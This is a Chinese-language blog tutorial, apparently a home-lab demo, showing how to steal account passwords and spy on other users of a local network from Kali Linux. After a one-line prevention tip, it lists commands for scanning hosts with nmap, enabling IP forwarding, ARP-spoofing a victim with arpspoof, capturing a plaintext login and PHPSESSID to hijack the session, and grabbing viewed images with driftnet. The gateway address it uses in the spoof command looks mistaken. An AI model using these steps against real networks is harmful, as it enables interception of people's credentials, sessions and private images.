kali linux局域網盜竊帳號密碼以及監控別人

在一個局域網內在沒有進行加密盜取監控你和帳號密碼是一個非常簡單實現的,預防ARP欺騙
預防

  1. 預防ARP欺騙
    他默認是動態的通常的不在意網關ip的
    設置成靜態的就可以簡單預防ARP欺騙了

實驗用的系統和工具

  1. 工具Nmap,Arpspoof,Driftnet和 Wireshark

  2. 命令
    命令1:在linux系統裏ifconfig顯示或配置網絡設備
    命令2:在winodws裏ifconfig顯示或配置網絡設備

  3. 攻擊端kali linux系統
    在這裏插入圖片描述
    在這裏插入圖片描述
    Linux版的 kali linux是一個專門進行滲透安全做的
    是黑客必不可少的工具之一
    kali有幾千個工具比如著名的列:
    掃描大王:Nmap
    Nmap在《黑客帝國》和《諜影重重:極限伯恩》等等電影裏也出現過
    學習書《Nmap 參考指南 》
    sql注入利器:sqlmap
    學習書《sqlmap入門到精通》
    神兵利器:msf
    學習書《Metasploit滲透測試指南》
    抓包工具:wire shark
    學習書《Wireshark網絡分析的藝術》《網絡協議分析》
    瑞士軍刀:burp suite
    學習書《BurpSuite 實戰指南》

    。。。。。。。。。
    還有很多就不多說了

  4. 客戶端winxp系統
    微軟開發windowsxp,windows2000,windows7,windows10.windows2003大家都在用windows就不多介紹了
    在這裏插入圖片描述

  5. 配置查看
    kali查看ip和網關

    ifconfig
    

    在這裏插入圖片描述
    winxp查看ip和網關

    ipconfi
    

    在這裏插入圖片描述

開始演示局域網密碼盜竊

  1. 用kali裏的nmap工具進行局域網掃描

    nmap -sP 192.168.43.0/24
    

    可以看見他存活這ip是192.168.43.218
    在這裏插入圖片描述
    英文不好的我果斷翻譯一下
    MAC地址是小米的
    我用的是小米手機開的熱點電腦連接的
    在這裏插入圖片描述

  2. 先進行進行IP流量轉發不然被黑的xp系統網絡就不能用了

    echo 1 > /proc/sys/net/ipv4/ip_forward 
    

    在這裏插入圖片描述

  3. arp欺騙
    kali現在沒有默認安裝arpspoof需要自己下載

    apt-get install dsniff ssldump
    

    下載
    在這裏插入圖片描述

  4. 轉發數據包

    arpspoof -i wlan0 -t 192.168.43.218 192.168.43.255
    

    在這裏插入圖片描述

  5. 客戶端登陸帳號密碼
    在這裏插入圖片描述

  6. 攻擊端的我就可以查看你所有客戶端操作的過程
    帳號密碼已經被抓取
    在這裏插入圖片描述

  7. 拿到PHPSESSID
    在這裏插入圖片描述

  8. 登陸
    登陸成功
    在這裏插入圖片描述

  9. 抓取客戶端照片
    kali現在需要下載 Driftnet

    apt-get install driftnet
    

    下載完成
    在這裏插入圖片描述
    開始抓取網卡流過的照片

    driftnet -i   wlan0
    

    在這裏插入圖片描述

    客戶端比如在訪問照片
    在這裏插入圖片描述
    攻擊端的我用Driftnet進行抓取照片

    driftnet -i   wlan0
    

    可以自己照片已經被抓取到了
    在這裏插入圖片描述

  10. 抓取qq聊天記錄
    哈哈哈哈哈哈哈哈哈哈就不要想了被加密了
    在這裏插入圖片描述

作者QQ2737977997

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章